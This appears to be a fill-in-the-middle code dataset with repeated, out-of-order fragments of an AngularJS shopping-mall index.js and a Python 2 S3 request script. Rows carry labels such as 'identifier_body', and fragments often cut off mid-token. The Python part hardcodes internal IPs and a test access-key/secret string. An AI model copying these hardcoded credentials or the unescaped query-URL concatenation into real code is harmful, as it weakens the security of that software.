$scope.isMyOrder=true;
$scope.orderList=null;
$http.get("data/12_showOrder.php?uname="+$rootScope.userName).success(function(data){
$scope.orderList=data;
for(var i=0;i<$scope.orderList.length;i++){
var date=new Date(Number($scope.orderList[i].orderTime));
$scope.orderList[i].orderTime=$scope.changeTime(date);
var status=$scope.orderList[i].status;
$scope.orderList[i].status=$scope.judgeStatus(status);
}
})
//转换日期格式
$scope.changeTime=function(date){
var year=date.getFullYear();
var mouth=date.getMonth();
mouth=mouth<10?("0"+mouth):mouth;
var day=date.getDate();
day=day<10?("0"+day):day;
var hour=date.getHours();
hour=hour<10?("0"+hour):hour;
var minues=date.getMinutes();
minues=minues<10?("0"+minues):minues;
var second=date.getSeconds();
second=second<10?("0"+second):second;
return year+'-'+mouth+'-'+day+'\n'+hour+":"+minues+":"+second;
}
//判断订单状态
$scope.judgeStatus=function(status){
switch(status){
case "1":
return "等待付款";
break;
case "2":
return "等待配货";
break;
case "3":
return "运输中";
break;
case "4":
return "已收货";
break;
}
}
}
}]);
function chose(obj){
$(obj).addClass("color-box-active").parent().siblings("label").children(".color-box-active").removeClass("color-box-active");
}
| identifier_body |
||
index.js | ",{
templateUrl:"tpl/mall_proList.html",
controller:"mallProListCtrl"
})
.when("/mall_proListbyteam/:id",{
templateUrl:"tpl/mall_proListbyteam.html",
controller:"mallProListByTeamCtrl"
})
.when("/mall_detail/:id",{
templateUrl:"tpl/mall_detail.html",
controller:"mallDetailCtrl"
})
.when("/mall_lottery",{
templateUrl:"tpl/mall_lottery.html",
controller:"mallLotteryCtrl"
})
.when("/mall_userCenter/:id",{
templateUrl:"tpl/mall_userCenter.html",
controller:"mallUserCenterCtrl"
})
.otherwise({redirectTo:"/APP_start"})
});
app.controller("mallMainCtrl",["$scope",function($scope){
}]);
app.controller("mallDetailCtrl",["$scope","$routeParams","$http","$rootScope",function($scope,$routeParams,$http,$rootScope){
//接收路由传递的参数,向服务器端请求商品详情
$scope.order={}
$http.get("data/7_showProductDetails.php?proId="+$routeParams.id).success(function(obj){
$scope.proDetail=obj;
$scope.order.count=1;
$scope.order.proId=$routeParams.id;
$scope.colorList=obj.colorList;
$scope.order.colorId=$scope.colorList[0].colorId;//颜色id;
$scope.photoList=$scope.colorList[0].photoList;//颜色对应的图片列表
$scope.sizeList=$scope.colorList[0].sizeList;//颜色对应的尺寸列表
$scope.Img={};
$scope.Img.s=$scope.colorList[0].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.order.sizeId=$scope.colorList[0].sizeList[0].sizeId;
//商品详情数组
$scope.pinfo=obj.pinfo.split("_");
$scope.$watch("Img.s",function(){
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
})
$scope.$watch("order.colorId",function(){
for(var i=0;i<$scope.colorList.length;i++){
if($scope.order.colorId==$scope.colorList[i].colorId){
$scope.photoList=$scope.colorList[i].photoList;
$scope.Img.s=$scope.colorList[i].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.sizeList=$scope.colorList[i].sizeList;
$scope.order.sizeId=$scope.colorList[i].sizeList[0].sizeId;
}
}
})
})
$scope.reduce=function(){
if($scope.order.count>1){
$scope.order.count--;
}
}
$scope.add=function(){
$scope.order.count++;
}
//加入购物车
$scope.addToCart=function(){
if($rootScope.userName){
$scope.order.uname=$rootScope.userName;
//发送请求提交数据
if($scope.order.proId!==undefined
&& $scope.order.count!==undefined
&& $scope.order.colorId!==undefined
&& $scope.order.sizeId!==undefined){
$http.post("data/8_cartAdd.php", $.param($scope.order)).success(function(txt){
if(txt=="ok"){
alert("商品添加购物车成功,您可以去到我的购物车进行结算")
}else{
alert("添加失败")
}
})
}
}else{
//TODO 弹出提示框,提醒用户登录
alert("您还未登录,请登录后在使用此功能")
}
}
}]);
app.controller("mallLotteryCtrl",["$scope",function($scope){
}]);
app.controller("mallSearchCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.kw=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/4_showProductByKw.php");
}]);
app.controller("mallProListCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.isPageShow=innerWidth>450?true:false;
$rootScope.searchMsg={};
$rootScope.searchMsg.pclass=$routeParams.id;
$rootScope.num=[];
$rootScope.proList=[];
$rootScope.loadMore(1,"data/5_showProductByPclass.php");
$scope.show=function(n){
$rootScope.loadMore(n+1,"data/5_showProductByPclass.php");
}
$scope.showNext=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.prev=function(){
$rootScope.searchMsg.pageNum--;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.add=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
}]);
app.controller("mallProListByTeamCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.team=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/6_showProductByTeam.php");
}]);
app.controller("mallUserCenterCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
if($routeParams.id==1){
$scope.isMyCart=true;
$scope.isMyOrder=false;
$http.get("data/9_cartShow.php?uname="+$rootScope.userName).success(function(data){
$scope.productList=data;
for(var i= 0,sum=0;i<$scope.productList.length;i++){
var total=($scope.productList[i].price*$scope.productList[i].count).toFixed(2);
$scope.productList[i].totalPrice=total;
sum+=Number(total);
}
$scope.total=sum;
})
$scope.removePro=function(did){
$scope.did=did;
$http.get("data/10_cartRemove.php?did="+did).success(function(txt){
if(txt=="ok"){
for(var i=0;i<$scope.productList.length;i++){
if($scope.productList[i].did==$scope.did){
$scope.total-=$scope.productList[i].totalPrice;
$scope.productList.splice(i,1);
break;
}
}
}else{
alert("删除失败了")
}
})
}
$scope.submitOrder=function(){
$scope.data={};
$scope.data.rcvId=1;
$scope.data.price=$scope.total;
$scope.data.payment=1;
$scope.data.uname=$rootScope.userName;
$scope.data.productList=JSON.stringify($scope.productList);
$http.post("data/11_addOrder.php", $.param($scope.data)).success(function(data){
if(data.msg=="succ"){
alert("订单提交成功,您的订单编号为"+data.orderNum+"; 您可以在我的订单中查看订单状态");
$scope.productList=[];
$scope.total=0;
}else{
alert("订单提交失败");
}
})
}
}else{
$scope.isMyCart=false;
$scope.isMyOrder=true;
$scope.orderList=null;
$http.get("data/12_showOrder.php?uname="+$rootScope.userName).success(function(data){
$scope.orderList=data;
for(var i=0;i<$scope.orderList.length;i++){
var date=new Date(Number($scope.orderList[i].orderTime));
$scope.orderList[i].orderTime=$scope.changeTime(date);
var status=$scope.orderList[i].status;
$scope.orderList[i].status=$scope.judgeStatus(status);
}
})
//转换日期格式
$scope.changeTime=function(date){
var year=date.getFullYear();
var mouth=date.getMonth();
mouth=mouth<10?("0"+mouth):mouth;
var day=date.getDate();
day=day<10?("0"+day):day;
var hour=date.getHours();
hour=hour<10?("0"+hour):hour;
var minues=date.getMinutes();
minues=minues<10?("0"+minues):minues;
var second=date.getSeconds();
second=second<10?("0"+second):second;
return year+'-'+mouth+'-'+day+'\n'+hour+":"+minues+":"+second;
}
//判断订单状态
$scope.judgeStatus=function(status){
switch(status){
case "1":
return "等待付款";
break;
case "2":
return "等待配货";
break;
case "3":
return "运输中";
break;
case "4":
return "已收货";
break;
}
}
}
}]);
function chose(obj){
$(obj).addClass("color-box-active").parent().siblings("label").children(".color-box-active").removeClass("color-box-active");
}
| identifier_name |
||
index.js | <=obj.pageCount;i++){
$rootScope.num.push(i);
$rootScope.isPageShow=true;
}
}else{
$rootScope.isPageShow=false;
if($rootScope.len<8){
$rootScope.searchMsg.pageNum++;
}
}
for (var i = 0; i < $rootScope.len; i++) {
var img=obj.data[i].img_sm;
obj.data[i].img_sm=img.slice(0,img.length-9)+"sm.jpg";
$rootScope.proList.push(obj.data[i]);
}
});
};
$rootScope.goToUserCenter=function(){
if($rootScope.userName){
$location.path('/mall_userCenter/1');
}else{
//TODO 弹出提示框;
alert("请登录");
}
}
}]);
//配置路由
app.config(function($routeProvider){
$routeProvider
.when("/APP_start",{
templateUrl:"tpl/APP_start.html"
})
.when("/mall_main",{
templateUrl:"tpl/mall_main.html",
controller:"mallMainCtrl"
})
.when("/mall_search/:id",{
templateUrl:"tpl/mall_search.html",
controller:"mallSearchCtrl"
})
.when("/mall_proList/:id",{
templateUrl:"tpl/mall_proList.html",
controller:"mallProListCtrl"
})
.when("/mall_proListbyteam/:id",{
templateUrl:"tpl/mall_proListbyteam.html",
controller:"mallProListByTeamCtrl"
})
.when("/mall_detail/:id",{
templateUrl:"tpl/mall_detail.html",
controller:"mallDetailCtrl"
})
.when("/mall_lottery",{
templateUrl:"tpl/mall_lottery.html",
controller:"mallLotteryCtrl"
})
.when("/mall_userCenter/:id",{
templateUrl:"tpl/mall_userCenter.html",
controller:"mallUserCenterCtrl"
})
.otherwise({redirectTo:"/APP_start"})
});
app.controller("mallMainCtrl",["$scope",function($scope){
}]);
app.controller("mallDetailCtrl",["$scope","$routeParams","$http","$rootScope",function($scope,$routeParams,$http,$rootScope){
//接收路由传递的参数,向服务器端请求商品详情
$scope.order={}
$http.get("data/7_showProductDetails.php?proId="+$routeParams.id).success(function(obj){
$scope.proDetail=obj;
$scope.order.count=1;
$scope.order.proId=$routeParams.id;
$scope.colorList=obj.colorList;
$scope.order.colorId=$scope.colorList[0].colorId;//颜色id;
$scope.photoList=$scope.colorList[0].photoList;//颜色对应的图片列表
$scope.sizeList=$scope.colorList[0].sizeList;//颜色对应的尺寸列表
$scope.Img={};
$scope.Img.s=$scope.colorList[0].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.order.sizeId=$scope.colorList[0].sizeList[0].sizeId;
//商品详情数组
$scope.pinfo=obj.pinfo.split("_");
$scope.$watch("Img.s",function(){
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
})
$scope.$watch("order.colorId",function(){
for(var i=0;i<$scope.colorList.length;i++){
if($scope.order.colorId==$scope.colorList[i].colorId){
$scope.photoList=$scope.colorList[i].photoList;
$scope.Img.s=$scope.colorList[i].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.sizeList=$scope.colorList[i].sizeList;
$scope.order.sizeId=$scope.colorList[i].sizeList[0].sizeId;
}
}
})
})
$scope.reduce=function(){
if($scope.order.count>1){
$scope.order.count--;
}
}
$scope.add=function(){
$scope.order.count++;
}
//加入购物车
$scope.addToCart=function(){
if($rootScope.userName){
$scope.order.uname=$rootScope.userName;
//发送请求提交数据
if($scope.order.proId!==undefined
&& $scope.order.count!==undefined
&& $scope.order.colorId!==undefined
&& $scope.order.sizeId!==undefined){
$http.post("data/8_cartAdd.php", $.param($scope.order)).success(function(txt){
if(txt=="ok"){
alert("商品添加购物车成功,您可以去到我的购物车进行结算")
}else{
alert("添加失败")
}
})
}
}else{
//TODO 弹出提示框,提醒用户登录
alert("您还未登录,请登录后在使用此功能")
}
}
}]);
app.controller("mallLotteryCtrl",["$scope",function($scope){
}]);
app.controller("mallSearchCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.kw=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/4_showProductByKw.php");
}]);
app.controller("mallProListCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.isPageShow=innerWidth>450?true:false;
$rootScope.searchMsg={};
$rootScope.searchMsg.pclass=$routeParams.id;
$rootScope.num=[];
$rootScope.proList=[];
$rootScope.loadMore(1,"data/5_showProductByPclass.php");
$scope.show=function(n){
$rootScope.loadMore(n+1,"data/5_showProductByPclass.php");
}
$scope.showNext=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.prev=function(){
$rootScope.searchMsg.pageNum--;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.add=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
}]);
app.controller("mallProListByTeamCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.team=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/6_showProductByTeam.php");
}]);
app.controller("mallUserCenterCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
if($routeParams.id==1){
$scope.isMyCart=true;
$scope.isMyOrder=false;
$http.get("data/9_cartShow.php?uname="+$rootScope.userName).success(function(data){
$scope.productList=data;
for(var i= 0,sum=0;i<$scope.productList.length;i++){
var total=($scope.productList[i].price*$scope.productList[i].count).toFixed(2);
$scope.productList[i].totalPrice=total;
sum+=Number(total);
}
$scope.total=sum;
})
$scope.removePro=function(did){
$scope.did=did;
$http.get("data/10_cartRemove.php?did="+did).success(function(txt){
if(txt=="ok"){
for(var i=0;i<$scope.productList.length;i++){
if($scope.productList[i].did==$scope.did){
$scope.total-=$scope.productList[i].totalPrice;
$scope.productList.splice(i,1);
break;
}
}
}else{
alert("删除失败了")
}
})
}
$scope.submitOrder=function(){
$scope.data={};
$scope.data.rcvId=1;
$scope.data.price=$scope.total;
$scope.data.payment=1;
$scope.data.uname=$rootScope.userName;
$scope.data.productList=JSON.stringify($scope.productList);
$http.post("data/11_addOrder.php", $.param($scope.data)).success(function(data){
if(data.msg=="succ"){
alert("订单提交成功,您的订单编号为"+data.orderNum+"; 您可以在我的订单中查看订单状态");
$scope.productList=[];
$scope.total=0;
}else{
alert("订单提交失败");
}
})
}
}else{
$scope.isMyCart=false;
$scope.isMyOrder=true;
$scope.orderList=null;
$http.get("data/12_showOrder.php?uname="+$rootScope.userName).success(function(data){
$scope.orderList=data;
for(var i=0;i<$scope.orderList.length;i++){
var date=new Date(Number($scope.orderList[i].orderTime)); | $scope.orderList[i].orderTime=$scope.changeTime(date);
var status=$scope.orderList[i].status;
$scope.orderList[i].status=$scope.judgeStatus(status);
}
}) | random_line_split |
|
checkData.py | tMarkerFromXML(xmlBody, markerStr):
marker = re.findall('<' + markerStr + '>(.+?)</' + markerStr + '>', xmlBody)
if marker and marker[0]:
logging.info('get marker in response %s' %marker[0])
return marker[0]
else:
logging.info('get no marker in response')
return None
#若calMd5为True,返回body MD5,否则返回响应body内容。
#若响应错误,返回空。
def make_request(s3Requesthandler,calMd5 = None, process=None):
global MD5_Global
myHTTPConnection = s3Requesthandler.myHTTPConnection
s3Request = s3Requesthandler.s3Request
returnData = None
#如果计算MD5则随机一个CHUNK_SIZE,否则固定CHUNK_SIZE大小。
if calMd5:
md5hashPart = 0; md5hashTotal = 0; fileHash = hashlib.md5();
checkData = False
CHUNK_SIZE = random.randint(4096,1048576)
logging.debug('CHUNK_SIZE: %d' %CHUNK_SIZE)
else: CHUNK_SIZE = 65536
peerAddr = myHTTPConnection.host; localAddr = ''
httpResponse = None
recvBody = ''
start_time = time.time()
end_time=0; status = '9999 '
try:
start_time = time.time()
myHTTPConnection.connection.putrequest(s3Request.method, s3Request.url, skip_host=1)
#发送HTTP头域
for k in s3Request.headers.keys():
myHTTPConnection.connection.putheader(k, s3Request.headers[k])
myHTTPConnection.connection.endheaders()
localAddr = str(myHTTPConnection.connection.sock._sock.getsockname())
peerAddr = str(myHTTPConnection.connection.sock._sock.getpeername())
logging.debug( 'Request:[%s], conn:[%s->%s], sendURL:[%s], sendHeaders:[%r], sendContent:[%s]' \
%(s3Request.requestType, localAddr, peerAddr, s3Request.url, s3Request.headers, s3Request.sendContent[0:1024]))
myHTTPConnection.connection.send(s3Request.sendContent)
waitResponseTimeStart = time.time()
#接收响应
httpResponse = myHTTPConnection.connection.getresponse(buffering=True)
waitResponseTime = time.time() - waitResponseTimeStart
logging.debug('get response, wait time %.3f' %waitResponseTime)
#读取响应体
contentLength = int(httpResponse.getheader('Content-Length', '-1'))
logging.debug('get ContentLength: %d' %contentLength)
#区分不同的请求,对于成功响应的GetObject请求,需要特殊处理,否则一次读完body内容。
#需要考虑range下载,返回2xx均为正常请求。
recvBytes = 0
if (httpResponse.status < 300) and s3Request.requestType in ('GetObject'):
#同时满足条件,才校验数据内容。
#1.打开calMd5开关。2.GetObject操作;3.正确返回200响应(206不计算)
while True:
datatmp = httpResponse.read(CHUNK_SIZE)
if not datatmp: break
recvBytes += len(datatmp)
if calMd5:
lastDatatmp = datatmp
fileHash.update(datatmp)
recvBody = '[receive content], length: %d' %recvBytes
if calMd5:
md5hashTotal = fileHash.hexdigest( )
returnData = md5hashTotal
else:
returnData = recvBody
else:
returnData = httpResponse.read()
recvBytes = len(returnData)
#要读完数据才算请求结束
end_time = time.time()
status = str(httpResponse.status) + ' ' + httpResponse.reason
#记日志、重定向(<400:debug; >=400,<500: warn; >=500:error)
if httpResponse.status < 400:
logging.debug('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
elif httpResponse.status < 500:
logging.warn('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url,waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
else:
logging.error('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime: [%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
if (httpResponse.status == 503):
flowControllMsg = 'Service unavailable, local data center is busy'
if recvBody.find(flowControllMsg) != -1: status = '503 Flow Control' #标记外部流控
requestID = httpResponse.getheader('x-amz-request-id', '9999999999999998')
#部分错误结果的头域中没有包含x-amz-request-id,则从recvBody中获取
if requestID == '9999999999999998' and httpResponse.status >= 300:
requestID = _getRequestIDFromBody_(recvBody)
if s3Request.method != 'HEAD' and contentLength != -1 and contentLength != recvBytes:
logging.error('data error. contentlength %d != dataRecvSize %d' %(contentLength, recvBytes))
raise Exception("Data Error Content-Length")
except KeyboardInterrupt:
if not status: status = '9991 KeyboardInterrupt'
except Exception, data:
returnData = None
import traceback
stack = traceback.format_exc()
logging.error('Caught exception:%s, Request:[%s], conn: [local:%s->peer:%s], URL:[%s], responseStatus:[%s], responseBody:[%r]' \
%(data, s3Request.requestType, localAddr, peerAddr, s3Request.url, status, recvBody[0:1024]))
logging.error('print stack: %s' %stack)
print 'ERROR: request %s/%s except: %s' %(s3Request.bucket, s3Request.key, stack)
finally:
if not end_time: end_time = time.time()
#关闭连接:1.按服务端语义,若connection:close,则关闭连接。
if httpResponse and (httpResponse.getheader('connection', '').lower() == 'close' or httpResponse.getheader('Connection', '').lower() == 'close'):
#关闭连接,让后续请求再新建连接。
logging.info('server inform to close connection')
myHTTPConnection.closeConnection()
#2.客户端感知的连接类错误,关闭连接。
elif not status <= '600':
logging.warning('caught exception, close connection')
#很可能是网络异常,关闭连接,让后续请求再新建连接。
myHTTPConnection.closeConnection()
time.sleep(.1)
#3.客户端配置了短连接
elif not myHTTPConnection.longConnection:
#python 2.7以下存在bug,不能直接使用close()方法关闭连接,不然客户端存在CLOSE_WAIT状态。
if myHTTPConnection.isSecure:
try:
import sys
if sys.version < '2.7':
import gc
gc.collect(0)
except: pass
else: myHTTPConnection.closeConnection()
if process: MD5_Global = returnData
return returnData
if __name__ == '__main__':
global MD5_Global_
printResult = time.time()
Service_1= '100.61.5.3'
Service_2 = '100.61.5.13'
#可以指定多个用户的AK,SK
User_AKSK = ['UDSIAMSTUBTEST000101,Udsiamstubtest000000UDSIAM | e.findall('<Key>(.+?)</Key>', xmlBody)
versions = re.findall('<VersionId>(.+?)</VersionId>', xmlBody)
for i in range(len(versions)):
if versions[i] == 'null': versions[i]=None
if len(versions)>0 and len(versions) != len(keys):
logging.error('response error, versions != keys %s' %xmlBody)
return []
if not len(versions): versions = [None for i in range(len(keys))]
return zip(keys,versions)
def ge | identifier_body |
|
checkData.py | , markerStr):
marker = re.findall('<' + markerStr + '>(.+?)</' + markerStr + '>', xmlBody)
if marker and marker[0]:
logging.info('get marker in response %s' %marker[0])
return marker[0]
else:
logging.info('get no marker in response')
return None
#若calMd5为True,返回body MD5,否则返回响应body内容。
#若响应错误,返回空。
def make_request(s3Requesthandler,calMd5 = None, process=None):
global MD5_Global
myHTTPConnection = s3Requesthandler.myHTTPConnection
s3Request = s3Requesthandler.s3Request
returnData = None
#如果计算MD5则随机一个CHUNK_SIZE,否则固定CHUNK_SIZE大小。
if calMd5:
md5hashPart = 0; md5hashTotal = 0; fileHash = hashlib.md5();
checkData = False
CHUNK_SIZE = random.randint(4096,1048576)
logging.debug('CHUNK_SIZE: %d' %CHUNK_SIZE)
else: CHUNK_SIZE = 65536
peerAddr = myHTTPConnection.host; localAddr = ''
httpResponse = None
recvBody = ''
start_time = time.time()
end_time=0; status = '9999 '
try:
start_time = time.time()
myHTTPConnection.connection.putrequest(s3Request.method, s3Request.url, skip_host=1)
#发送HTTP头域
for k in s3Request.headers.keys():
myHTTPConnection.connection.putheader(k, s3Request.headers[k])
myHTTPConnection.connection.endheaders()
localAddr = str(myHTTPConnection.connection.sock._sock.getsockname())
peerAddr = str(myHTTPConnection.connection.sock._sock.getpeername())
logging.debug( 'Request:[%s], conn:[%s->%s], sendURL:[%s], sendHeaders:[%r], sendContent:[%s]' \
%(s3Request.requestType, localAddr, peerAddr, s3Request.url, s3Request.headers, s3Request.sendContent[0:1024]))
myHTTPConnection.connection.send(s3Request.sendContent)
waitResponseTimeStart = time.time()
#接收响应
httpResponse = myHTTPConnection.connection.getresponse(buffering=True)
waitResponseTime = time.time() - waitResponseTimeStart
logging.debug('get response, wait time %.3f' %waitResponseTime)
#读取响应体
contentLength = int(httpResponse.getheader('Content-Length', '-1'))
logging.debug('get ContentLength: %d' %contentLength)
#区分不同的请求,对于成功响应的GetObject请求,需要特殊处理,否则一次读完body内容。
#需要考虑range下载,返回2xx均为正常请求。
recvBytes = 0
if (httpResponse.status < 300) and s3Request.requestType in ('GetObject'):
#同时满足条件,才校验数据内容。
#1.打开calMd5开关。2.GetObject操作;3.正确返回200响应(206不计算)
while True:
datatmp = httpResponse.read(CHUNK_SIZE)
if not datatmp: break
recvBytes += len(datatmp)
if calMd5:
lastDatatmp = datatmp
fileHash.update(datatmp)
recvBody = '[receive content], length: %d' %recvBytes
if calMd5:
md5hashTotal = fileHash.hexdigest( )
returnData = md5hashTotal
else:
returnData = recvBody
else:
returnData = httpResponse.read()
recvBytes = len(returnData)
#要读完数据才算请求结束
end_time = time.time()
status = str(httpResponse.status) + ' ' + httpResponse.reason
#记日志、重定向(<400:debug; >=400,<500: warn; >=500:error)
if httpResponse.status < 400:
logging.debug('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
elif httpResponse.status < 500:
logging.warn('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url,waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
else:
logging.error('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime: [%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
if (httpResponse.status == 503):
flowControllMsg = 'Service unavailable, local data center is busy'
if recvBody.find(flowControllMsg) != -1: status = '503 Flow Control' #标记外部流控
requestID = httpResponse.getheader('x-amz-request-id', '9999999999999998')
#部分错误结果的头域中没有包含x-amz-request-id,则从recvBody中获取
if requestID == '9999999999999998' and httpResponse.status >= 300:
requestID = _getRequestIDFromBody_(recvBody)
if s3Request.method != 'HEAD' and contentLength != -1 and contentLength != recvBytes:
logging.error('data error. contentlength %d != dataRecvSize %d' %(contentLength, recvBytes))
raise Exception("Data Error Content-Length")
except KeyboardInterrupt:
if not status: status = '9991 KeyboardInterrupt'
except Exception, data:
returnData = None
import traceback
stack = traceback.format_exc()
logging.error('Caught exception:%s, Request:[%s], conn: [local:%s->peer:%s], URL:[%s], responseStatus:[%s], responseBody:[%r]' \
%(data, s3Request.requestType, localAddr, peerAddr, s3Request.url, status, recvBody[0:1024]))
logging.error('print stack: %s' %stack)
print 'ERROR: request %s/%s except: %s' %(s3Request.bucket, s3Request.key, stack)
finally:
if not end_time: end_time = time.time()
#关闭连接:1.按服务端语义,若connection:close,则关闭连接。
if httpResponse and (httpResponse.getheader('connection', '').lower() == 'close' or httpResponse.getheader('Connection', '').lower() == 'close'):
#关闭连接,让后续请求再新建连接。
logging.info('server inform to close connection')
myHTTPConnection.closeConnection()
#2.客户端感知的连接类错误,关闭连接。
elif not status <= '600':
logging.warning('caught exception, close connection')
#很可能是网络异常,关闭连接,让后续请求再新建连接。
myHTTPConnection.closeConnection()
time.sleep(.1)
#3.客户端配置了短连接
elif not myHTTPConnection.longConnection:
#python 2.7以下存在bug,不能直接使用close()方法关闭连接,不然客户端存在CLOSE_WAIT状态。
if myHTTPConnection.isSecure:
try:
import sys
if sys.version < '2.7':
import gc
gc.collect(0)
except: pass
else: myHTTPConnection.closeConnection()
if process: MD5_Global = returnData
return returnData
if __name__ == '__main__':
global MD5_Global_
printResult = time.time()
Service_1= '100.61.5.3'
Service_2 = '100.61.5.13'
#可以指定多个用户的AK,SK
User_AKSK = ['UDSIAMSTUBTEST000101,Udsiamstubtest000000UDSIAMSTUBTEST000101',]
#server = '127.0.0.1', isSecure = False, timeout=80, serialNo = None, longConnection = False
server1_conn = s3PyCmd.MyHTTPConnection(host=Service_1, isSecure=False, timeout=600, serialNo=0, longConnection=False)
server2_conn = s3PyCmd.MyHTTPConnection(host=Service_2, isSecure=False, timeout=600, serialNo=0, longConnection | rFromXML(xmlBody | identifier_name |
|
checkData.py | if not len(versions): versions = [None for i in range(len(keys))]
return zip(keys,versions)
def getMarkerFromXML(xmlBody, markerStr):
marker = re.findall('<' + markerStr + '>(.+?)</' + markerStr + '>', xmlBody)
if marker and marker[0]:
logging.info('get marker in response %s' %marker[0])
return marker[0]
else:
logging.info('get no marker in response')
return None
#若calMd5为True,返回body MD5,否则返回响应body内容。
#若响应错误,返回空。
def make_request(s3Requesthandler,calMd5 = None, process=None):
global MD5_Global
myHTTPConnection = s3Requesthandler.myHTTPConnection
s3Request = s3Requesthandler.s3Request
returnData = None
#如果计算MD5则随机一个CHUNK_SIZE,否则固定CHUNK_SIZE大小。
if calMd5:
md5hashPart = 0; md5hashTotal = 0; fileHash = hashlib.md5();
checkData = False
CHUNK_SIZE = random.randint(4096,1048576)
logging.debug('CHUNK_SIZE: %d' %CHUNK_SIZE)
else: CHUNK_SIZE = 65536
peerAddr = myHTTPConnection.host; localAddr = ''
httpResponse = None
recvBody = ''
start_time = time.time()
end_time=0; status = '9999 '
try:
start_time = time.time()
myHTTPConnection.connection.putrequest(s3Request.method, s3Request.url, skip_host=1)
#发送HTTP头域
for k in s3Request.headers.keys():
myHTTPConnection.connection.putheader(k, s3Request.headers[k])
myHTTPConnection.connection.endheaders()
localAddr = str(myHTTPConnection.connection.sock._sock.getsockname())
peerAddr = str(myHTTPConnection.connection.sock._sock.getpeername())
logging.debug( 'Request:[%s], conn:[%s->%s], sendURL:[%s], sendHeaders:[%r], sendContent:[%s]' \
%(s3Request.requestType, localAddr, peerAddr, s3Request.url, s3Request.headers, s3Request.sendContent[0:1024]))
myHTTPConnection.connection.send(s3Request.sendContent)
waitResponseTimeStart = time.time()
#接收响应
httpResponse = myHTTPConnection.connection.getresponse(buffering=True)
waitResponseTime = time.time() - waitResponseTimeStart
logging.debug('get response, wait time %.3f' %waitResponseTime)
#读取响应体
contentLength = int(httpResponse.getheader('Content-Length', '-1'))
logging.debug('get ContentLength: %d' %contentLength)
#区分不同的请求,对于成功响应的GetObject请求,需要特殊处理,否则一次读完body内容。
#需要考虑range下载,返回2xx均为正常请求。
recvBytes = 0
if (httpResponse.status < 300) and s3Request.requestType in ('GetObject'):
#同时满足条件,才校验数据内容。
#1.打开calMd5开关。2.GetObject操作;3.正确返回200响应(206不计算)
while True:
datatmp = httpResponse.read(CHUNK_SIZE)
if not datatmp: break
recvBytes += len(datatmp)
if calMd5:
lastDatatmp = datatmp
fileHash.update(datatmp)
recvBody = '[receive content], length: %d' %recvBytes
if calMd5:
md5hashTotal = fileHash.hexdigest( )
returnData = md5hashTotal
else:
returnData = recvBody
else:
returnData = httpResponse.read()
recvBytes = len(returnData)
#要读完数据才算请求结束
end_time = time.time()
status = str(httpResponse.status) + ' ' + httpResponse.reason
#记日志、重定向(<400:debug; >=400,<500: warn; >=500:error)
if httpResponse.status < 400:
